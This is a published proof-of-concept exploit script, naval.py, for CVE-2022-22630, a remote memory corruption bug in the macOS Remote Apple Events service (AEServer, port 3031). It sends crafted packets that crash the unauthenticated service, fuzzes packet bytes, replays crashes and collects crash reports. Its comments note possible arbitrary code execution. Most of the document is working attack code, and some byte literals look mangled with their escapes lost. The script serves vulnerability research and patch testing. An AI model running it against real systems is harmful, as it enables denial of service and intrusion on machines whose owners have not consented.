Authored by Jeremy Brown

This is a proof of concept exploit for the Apple macOS remote events remote memory corruption vulnerability. It serves as a toolkit to help debug and trigger crashes.

advisories | CVE-2022-22630

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# naval.py
#
# Apple macOS Remote Events Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# =====
# Intro
# =====
#
# [eppc] Hello from AEServer
#
# Remote Apple Events is a core service and remote system administration and automation
# tool for Macs. It can be enabled via System Preferences -> Sharing and listens on
# port tcp/3031 and may be used in enterprise environments for remote administration.
# Sending malformed packets triggers a crash in the AEServer binary which may allow for
# arbitrary code execution on the remote machine within the context of the _eppc user.
# However, the crash is subtle as the service is automatically restarted and only a log
# in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled.
#
# Although a controlled, reliable crash at an arbitrary location is difficult, it was
# eventually achieved during testing with repeated characters in packets during sessions.
#
# Thread 0 crashed with X86 Thread State (64-bit):
# rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370
# rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8
# r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0
# r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218
# rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260
#
# While debugging it looks like the process is crashing when trying to release or
# dereference memory that has been deallocated, likely a sign of a heap related bug
# such as a use-after-free bug.
#
# This code serves as a toolkit to help debug and trigger crashes, but as mentioned
# extensive testing was required to gain more precise control of rax/rcx. Also note
# that authentication is not required to trigger crashes service locally or remotely.
#
# =======
# Details
# =======
#
# Much of the functionality depends on running this locally on the target box, such
# as debugging with ReportCrash logs, but it can certainly trigger remote crashes too
# if you pass the --remote flag (disables local debugging stuff).
#
# $ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets
# ....
#
# $ head crashes.txt
# 1 - (0x7e @ 1) -> 0x20
# [many more truncated]
#
# $ ./naval.py 10.0.0.12 --sleep --replay "1:7e:1" // pkt:byte:index
# ....
#
# Then within 10 seconds, start the debugger on the local target.. GOGOGO
#
# $ sudo lldb -o "attach --name AEServer" -o c
# ....
#
# (lldb) c
# Process 50050 resuming
# Process 50050 stopped
# * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8)
# frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31
#
# And now you can explore the crash
#
# One can also check to see AEServer receving packets:
# > dtrace -n 'syscall::*recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' | grep AEServer
#
# ===
# Fix
# ===
# - Addressed in Monterey 12.3
#
# CVE-2022-22630
#

import os
import sys
import argparse
import datetime
import time
import psutil
import shutil
import signal
import socket
import random
import re

REPORT_DIR = '/Library/Logs/DiagnosticReports'
LOG_DIR = 'logs'

PORT = 3031 # eppc

CRASH_LOG = 'crashes' + str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")) + '.txt'
REPORT_CRASH = True
SLEEP_TIME = 10
MAX_BYTE = 255 # 0xff

#
# original packets
#
PKT_1_ORIG = b'PPCTx00x00x00x01x00x00x00x01'
PKT_2_ORIG = b'xe4LPRTx01xe1x01xe7x06finderxdfxdbxe3x02x01=xdfxdfxdfxdfxd5x00'
PKT_3_ORIG = b'xe4SREQxdfxdfxdfxdfxdfx01xe7x06finderxdfxdbxe5x04B{xbfxacxdfxdfxdfxdfxdfxdfxdfxdfxdcxe5x04testxdfxddx00'
PKT_4_ORIG = b'x16x03x01x00x92x01x00x00x8ex03x03x61x00x8bx66x96xc7x08xa2xe8x0ex53x13xbdxd3x1cx69x12x43xd3x03xe2xecx8dx61x3dx01xedx67xd7x62xf8xcax00x00x2cx00xffxc0x2cxc0x2bxc0x24xc0x23xc0x0axc0x09xc0x08xc0x30xc0x2fxc0x28xc0x27xc0x14xc0x13xc0x12x00x9dx00x9cx00x3dx00x3cx00x35x00x2fx00x0ax01x00x00x39x00x0ax00x08x00x06x00x17x00x18x00x19x00x0bx00x02x01x00x00x0dx00x12x00x10x04x01x02x01x05x01x06x01x04x03x02x03x05x03x06x03x00x05x00x05x01x00x00x00x00x00x12x00x00x00x17x00x00'
PKT_5_ORIG = b'x16x03x03x00x46x10x00x00x42x41x04x8dxd9xbcx5fx9bx0dx86x28xdax1fxbax75xe3x01x06x73xf4x28xe2xe5x9bx2exfcx75x0cxadx3dx7dxc8x59xc0x20xcexcbxdfx87x88x09x46x1fxf3x97x3fxb8xd1xc8xf5x4bxa9x9fxdcxaexbax75x50xfax96xd5xcfxa2xa4xecx7bx61'

#
# crashing packets
#
PKT_1 = b'PPCTx00x00x00x01x00x00x00x01'
PKT_2 = b'xe4LPRTx01xe1x01xe7x06xxxyyyxdfxdbxe3x02x01=xdfxdfxdfxdfxd5x00' # s/finder/xxxyyy

class Naval(object):
def __init__(self, args):
self.host = args.host
self.fuzz = args.fuzz
self.replay = args.replay
self.remote = args.remote
self.reprofile = args.reprofile
self.original = args.original
self.sleep = args.sleep

self.pkt1 = None
self.pkt2 = None

# original
self.pkt3 = None
self.pkt4 = None
self.pkt5 = None

self.pkt_pick = 0

self.pkt_num = None
self.byte = None
self.index = None

self.logs = []

def run(self):
if(self.remote):
REPORT_CRASH = False
else:
REPORT_CRASH = True

if(REPORT_CRASH):
#
# sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
#
if('ReportCrash' not in (proc.name() for proc in psutil.process_iter())):
print("ReportCrash isn't running, make sure it's enabled firstn")
return -1

if(os.path.isdir(REPORT_DIR)):
try:
logs = os.listdir(REPORT_DIR)
except Exception as error:
print("failed to list %s: %sn" % (REPORT_DIR, error))
return -1
else:
print("dir %s doesn't exist, can't fuzz and check for crashesn" % REPORT_DIR)
return -1

if(self.original):
# non-crashing
self.pkt1 = PKT_1_ORIG
self.pkt2 = PKT_2_ORIG
self.pkt3 = PKT_3_ORIG
self.pkt4 = PKT_4_ORIG
self.pkt5 = PKT_5_ORIG
else:
# crashing
self.pkt1 = PKT_1
self.pkt2 = PKT_2

if(self.replay):
if(len(self.replay.split(':')) != 3):
print("invalid replay format: %s" % self.replay)
return -1

replay = self.replay.split(':')

try:
self.pkt_num = int(replay[0])
except Exception as error:
print("packet number %s is invalid: %s", (pkt_num, error))
return -1

try:
self.byte = int(replay[1], 16)
except Exception as error:
print("byte %s is invalid: %s", (byte, error))
return -1

try:
self.index = int(replay[2])
except Exception as error:
print("index %s is invalid: %s", (index, error))
return -1

if(self.pkt_num == 1):
pkt = self.modifyPacket(self.pkt1, self.byte, self.index)

if(pkt == None):
return -1
elif(self.pkt_num == 2):
pkt = self.modifyPacket(self.pkt2, self.byte, self.index)

if(pkt == None):
return -1
else:
print("pkt number must be 1 or 2")
return -1

print("replaying packetsn")

self.showRepro(pkt)

if(self.reprofile):
if(self.repro(self.reprofile) < 0):
print("failed")
return -1

return 0

#
# fuzz each packet one after another
#
if(self.fuzz):
print("fuzzing sequentially packet 1n")

self.pkt_num = 1

if(self.fuzzPacketSeq(self.pkt1) < 0):
print("failed")
return -1

print("fuzzing sequentially packet 2n")

self.pkt_num = 2

if(self.fuzzPacketSeq(self.pkt2) < 0):
print("failed")
return -1

if(self.original):
self.pkt_num = 3

if(self.fuzzPacketSeq(self.pkt3) < 0):
print("failed")
return -1

self.pkt_num = 4

if(self.fuzzPacketSeq(self.pkt4) < 0):
print("failed")
return -1

self.pkt_num = 5

if(self.fuzzPacketSeq(self.pkt5) < 0):
print("failed")
return -1
else:
if(not self.replay):
if(self.original):
print("sending original packets for testingn")
else:
print("sending packets to trigger crashn")

self.showRepro([])

sock = self.getSock()

if(sock == None):
return -1

try:
sock.connect((self.host, PORT))
except Exception as error:
print("connect() failed: %sn" % error)
return -1

if(self.sleep):
time.sleep(SLEEP_TIME)

try:
sock.send(self.pkt1)
sock.recv(256)
except Exception as error:
print("failed to send/recv packet 1: %sn" % error)
return -1

try:
sock.send(self.pkt2)
except Exception as error:
print("failed to send packet 2: %sn" % error)
return -1

if(self.original):
try:
sock.send(PKT_3_ORIG)
except Exception as error:
print("failed to send packet 3: %sn" % error)
return -1

try:
sock.send(PKT_4_ORIG)
except Exception as error:
print("failed to send packet 4: %sn" % error)
return -1

try:
sock.send(PKT_5_ORIG)
except Exception as error:
print("failed to send packet 5: %sn" % error)
return -1

sock.close()

if(REPORT_CRASH):
self.checkReports()

print("donen")

return 0

def getSock(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
except Exception as error:
print("socket() failed: %sn" % error)
return None

return sock

def fuzzPacketSeq(self, packet):
c = 0
i = 0

#
# flip each byte in the packet sequentially from 0 ... 255
#
while(i < len(packet)):
while(c <= MAX_BYTE):
pkt = bytearray(packet)

self.index = i
self.byte = c

orig = pkt[self.index]
pkt[self.index] = self.byte

print("pkt @ index=%d (%s -> %s)" % (self.index, hex(orig), hex(pkt[self.index])))

sock = self.getSock()

if(sock == None):
return -1

try:
sock.connect((self.host, PORT))
except Exception as error:
print("connect() failed: %sn" % error)
continue

if(self.sendPacket(sock, pkt) < 0):
print("sendPacket() failedn")
return -1

sock.close()

self.showRepro(pkt)

if(REPORT_CRASH):
self.checkReports()

c += 1

c = 0
i += 1

return 0

def createPacket(self, pkt_name):
n = random.randint(8,4096)

print("created x42 x %d for %sn" % (n, pkt_name))

return str.encode('B' * n)

def modifyPacket(self, pkt, byte, index):
if((index < 0) or (index >= len(pkt))):
print("index must be 0 - %dn" % (len(pkt)-1))
return -1

pkt = pkt[:index] + bytes([byte]) + pkt[index + 1:]

return pkt

def sendPacket(self, sock, pkt):
try:
if(self.pkt_pick == 1):
sock.send(pkt)
else:
sock.send(self.pkt1)

sock.recv(256)
except socket.timeout:
print("timed out")
except Exception as error:
print("send/recv failed for packet #1: %sn" % error)

try:
if(self.pkt_pick == 2):
sock.send(pkt)
else:
sock.send(self.pkt2)

if(self.original):
sock.recv(256) # not necessary for crashing packets 1 & 2
except Exception as error:
print("send/recv failed for packet #2: %sn" % error)

if(self.original):
try:
if(self.pkt_pick == 3):
sock.send(pkt)
else:
pick = random.randint(1,2)

#
# pick=1 means self.pkt3 doesn't change
#

if(pick == 2):
self.pkt3 = self.createPacket('pkt3')

sock.send(self.pkt3)

sock.recv(256)
except Exception as error:
print("send/recv failed for packet #3: %sn" % error)

try:
if(self.pkt_pick == 4):
sock.send(pkt)
else:
pick = random.randint(1,2)

if(pick == 2):
self.pkt4 = self.createPacket('pkt4')

sock.send(self.pkt4)

sock.recv(256)
except Exception as error:
print("send/recv failed for packet #4: %sn" % error)

try:
if(self.pkt_pick == 5):
sock.send(pkt)
else:
pick = random.randint(1,2)

if(pick == 2):
self.pkt5 = self.createPacket('pkt5')

sock.send(self.pkt5)

sock.recv(256)
except Exception as error:
print("send/recv failed for packet #5: %sn" % error)

return 0

def repro(self, filename):
print("reproing crash with %sn" % os.path.basename(filename))

try:
with open(filename, 'r') as file:
data = file.readlines()
except Exception as error:
print("failed to read file %s: %s" % (filename, error))
return -1

try:
self.pkt1 = bytes.fromhex(data[0].replace('x', ''))
self.pkt2 = bytes.fromhex(data[1].replace('x', ''))

if(self.original):
self.pkt3 = bytes.fromhex(data[2].replace('x', ''))
self.pkt4 = bytes.fromhex(data[3].replace('x', ''))
self.pkt5 = bytes.fromhex(data[4].replace('x', ''))
except Exception as error:
print("failed to parse repro: %s" % error)
return -1

sock = self.getSock()

if(sock == None):
return -1

try:
sock.connect((self.host, PORT))
except Exception as error:
print("connect() failed: %sn" % error)
return -1

if(self.sleep):
time.sleep(SLEEP_TIME)

try:
sock.send(self.pkt1)
sock.recv(256)
except socket.timeout:
print("timed out")
except Exception as error:
print("send/recv failed for packet #1: %sn" % error)

try:
sock.send(self.pkt2)

if(self.original):
sock.recv(256) # not necessary for crashing packets 1 & 2
except Exception as error:
print("send/recv failed for packet #2: %sn" % error)

if(self.original):
try:
sock.send(self.pkt3)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #3: %sn" % error)

try:
sock.send(self.pkt4)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #4: %sn" % error)

try:
sock.send(self.pkt5)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #5: %sn" % error)

sock.close()

self.showRepro([])

if(REPORT_CRASH):
self.checkReports()

print("donen")

return 0

def getHex(self, data):
return ''.join(f'x{byte:02x}' for byte in data)

def printHex(self, data):
print(''.join(f'x{byte:02x}' for byte in data))

def showRepro(self, pkt):
if(len(pkt) == len(self.pkt1)):
self.printHex(pkt)
else:
self.printHex(self.pkt1)

if(len(pkt) == len(self.pkt2)):
self.printHex(pkt)
else:
self.printHex(self.pkt2)

if(self.original):
if(len(pkt) == len(self.pkt3)):
self.printHex(pkt)
else:
self.printHex(self.pkt3)

if(len(pkt) == len(self.pkt4)):
self.printHex(pkt)
else:
self.printHex(self.pkt4)

if(len(pkt) == len(self.pkt5)):
self.printHex(pkt)
else:
self.printHex(self.pkt5)

print()

#
# restore original packets
#
self.pkt3 = PKT_3_ORIG
self.pkt4 = PKT_4_ORIG
self.pkt5 = PKT_5_ORIG

def checkReports(self):
time.sleep(2) # make sure ReportCrash has time to do its thing

try:
logs_now = os.listdir(REPORT_DIR)
except Exception as error:
print("failed to open %s for reading: %sn" % (REPORT_DIR, error))
return -1

if(len(logs_now) > len(self.logs)):
logs_new = list(set(logs_now) - set(self.logs))

#
# if we have new crash logs, grab the pc and correlate it with repro
#
for log in logs_new:
if(log.startswith('AEServer') and log.endswith('.crash')):
log_file = REPORT_DIR + os.sep + log

try:
with open(log_file, 'r') as file:
data = file.read()
except Exception as error:
print("failed to read %s: %sn" % (log, error))
return -1

pc = re.search('0x(.*)', data)

if(pc != None):
pc = '0x' + pc.group(1).lstrip('0')
else:
print("couldn't get pc from crash logn")

print("found crash @ pc=%sn" % pc)

#
# create a crash log if we're fuzzing or replaying bytes at indices
#
if(self.fuzz):
crash_info = 'pkt #' + str(self.pkt_num) + ' - (byte=' + hex(self.byte) + ' @ index=' + str(self.index) + ') -> ' + pc + 'n'

try:
with open(CRASH_LOG, 'a') as file:
file.write(crash_info)
except Exception as error:
print("failed to write %s: %sn" % (crash_info, error))
return -1

if(not os.path.isdir(LOG_DIR)):
try:
os.mkdir(LOG_DIR)
except Exception as error:
print("failed to mkdir %s: %sn" % (LOG_DIR, error))

log_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'

#
# move crash log file
#
try:
shutil.move(log_file, log_name)
except Exception as error:
print("failed to move %s: %sn" % (log_file, error))
return -1

ips_file = REPORT_DIR + os.sep + log.split('.')[0] + '.ips'

ips_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'

#
# check if there's an associated .ips
#
if(os.path.isfile(ips_file)):
try:
# shutil.move(ips_file, LOG_DIR)
shutil.move(ips_file, ips_name)
except Exception as error:
print("failed to move %s: %sn" % (ips_file, error))
return -1

#
# write repro if random fuzzing (no byte/index to replay)
#
# note: possible bug somewhere preventing pkt 3-5 from saving the correct repro,
# (eg. if mutated with B's), so for now we're just extra verbose with output when
# mutating packets and stop if pc contains 424242 so we can debug from there
#
repro_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + pc + '_' + 'repro' + '.txt'

try:
with open(repro_name, 'w') as file:
file.write(self.getHex(self.pkt1))
file.write('n')
file.write(self.getHex(self.pkt2))

if(self.original):
file.write('n')
file.write(self.getHex(self.pkt3))
file.write('n')
file.write(self.getHex(self.pkt4))
file.write('n')
file.write(self.getHex(self.pkt5))
except Exception as error:
print("failed to write %s: %sn" % (repro_name, error))
return -1

#
# temporary to help triage crashing packets
#
if('424242' in pc):
self.showRepro([])
sys.exit(0)

#
# reset logs after move
#
try:
self.logs = os.listdir(REPORT_DIR)
except Exception as error:
print("failed to list %s: %sn" % (REPORT_DIR, error))
return -1

return 0

def stop(signum, frame):
print()
sys.exit(0)

def arg_parse():
parser = argparse.ArgumentParser()

parser.add_argument("host",
type=str,
help="target listening on eppc port 3031")

parser.add_argument("--fuzz",
"--fuzz",
default=False,
action="store_true",
help="sequentially exhaust bytes in each packet and display crashing PC as available")

parser.add_argument("--remote",
"--remote",
default=False,
action="store_true",
help="target remote hosts and turn disable local debugging support")

parser.add_argument("--replay",
"--replay",
type=str,
help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3")

parser.add_argument("--reprofile",
"--reprofile",
type=str,
help="filename containing packet data on each line to replay (generated by random fuzzing)")

parser.add_argument("--original",
"--original",
default=False,
action="store_true",
help="use the original non-crashing packets")

parser.add_argument("--sleep",
"--sleep",
default=False,
action="store_true",
help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)")

args = parser.parse_args()

return args

def main():
signal.signal(signal.SIGINT, stop)

args = arg_parse()

nr = Naval(args)

result = nr.run()

if(result > 0):
sys.exit(-1)

if(__name__ == '__main__'):
main()